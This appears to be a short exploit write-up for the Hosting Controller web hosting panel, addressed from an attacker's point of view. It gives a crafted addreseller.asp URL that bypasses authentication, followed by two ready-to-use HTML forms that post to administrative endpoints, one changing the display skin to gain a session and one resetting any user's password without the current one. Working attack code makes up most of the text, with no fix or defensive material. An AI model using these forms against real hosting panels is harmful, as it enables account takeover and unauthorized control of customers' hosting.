1-[Remote Attacker] can login to hosting controller Panel. He can also change all others' passwords:
    1.1- http://[HC URL]/hosting/addreseller.asp?reseller=[USERNAME]  -> for ex. [USERNAME]= resadmin
    1.2- Now, to login without changing the password, attacker must run "ChangeDisplay.htm" then redirect to "main.asp"
        ~~~~~~~~~~~~~~~~1.2.1 ChangeDisplay.htm~~~~~~~~~~~~~~~~~~~~~~~~
            <script>
            function check(){
                _action = '/AdminSettings/displays.asp?DecideAction=1&ChangeSkin=1'
                frmDisplay.action = window.document.all.URL.value + _action
                return true;
            }
            </script>
            URL: <input type="text" name="URL" />
            <form name="frmDisplay" action="" method="post" onsubmit="return check()">
            <input type="hidden" name="TemplateSkin" value="PanelXP/Blue" />
            <input type="submit" />
            </form>
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    1.3- Attacker, also can change username's password without having current password by "ChangePass.htm"
        ~~~~~~~~~~~~~~~~1.3.1 ChangePass.htm~~~~~~~~~~~~~~~~~~~~~~~~
            <script>
            function check(){
                _action = '/Accounts/AccountActions.asp?ActionType=UpdateUser'
                frmChangePass.action = window.document.all.URL.value + _action
                return true;
            }
            </script>
            URL: <input type="text" name="URL" /><br />
            <form name="frmChangePass" action="" method="post" onsubmit="return check()">
            UserName: <input type="text" name="UserName" value="[USERNAME]" /> <br />
            FullName: <input type="text" name="FullName" value="[USERNAME]" /> <br />
            Description: <input type="text" name="Description" value="Something" /> <br />
            Password: <input type="text" name="Pass1" value="" /> <br />
            Confirm Password: <input type="text" name="ConfPass" value="" /> <br />
            <input type="hidden" name="DefaultDiscount" value="0" />
            <input type="hidden" name="CreditLimit" value="0" />
            <input type="hidden" name="ActionType" value="AddUser" />
            <input type="hidden" name="PassCheck" value="TRUE" />
            <input type="submit" />
            </form>
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~